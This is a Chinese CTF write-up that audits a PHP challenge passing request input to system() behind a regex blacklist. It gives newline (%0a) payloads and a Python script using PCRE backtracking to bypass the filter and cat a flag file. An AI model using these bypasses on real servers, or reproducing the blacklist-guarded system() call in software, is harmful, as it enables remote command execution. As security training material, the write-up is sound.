开始代码审计~
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
1. putenv('PATH=/home/rceservice/jail'); 配置了一个环境变量,所以我们输入系统命令的时候需要找到它的绝对路径比如/bin/cat .
2. is_string() 说明我们传入的value,必须是字符型.
3. preg_math(),我们需要绕过这个正则表达式,不过它真的好长.
4. json_decode(),说明我们传入的格式为json格式.
5. system(),我们可以通过传入系统命令来找出flag值.
我们开始进行绕过preg_math()~
我们可以通过两种姿势来绕过~
1. %0a 绕过
知识点:
1 " . "不会匹配换行符(%0a,\n),除非正则表达式后面添加了m(多行模式)选项,或者s选项,可以使 . 可以在单行模式下匹配换行符,如下.
<?php
$json = "flag";
if (preg_match('/^.*(flag).*$/', $json)) {
echo 'Hacking attempt detected';
}
?>
只需要 $json="\nflag"
2 当%0a在末尾时,$似乎会忽略%0a,如下.
if(preg_math('/^flag$/',$_GET['a'])&&$_GET['a']!=='flag'){
echo $flag;
}
只需传入 ?a=flag%a
开始构造payload~
?cmd={"cmd":"/bin/cat /home/rceservice/flag"%0a}%0a%0a
?cmd=%0a{"cmd":"/bin/cat /home/rceservice/flag"%0a}
2. PCRE回溯绕过
知识点:
PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)
import requests
url='http://ffa3fe84-58c7-4980-bf07-b573c0c5dcdb.node5.buuoj.cn:81/'
data={
'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)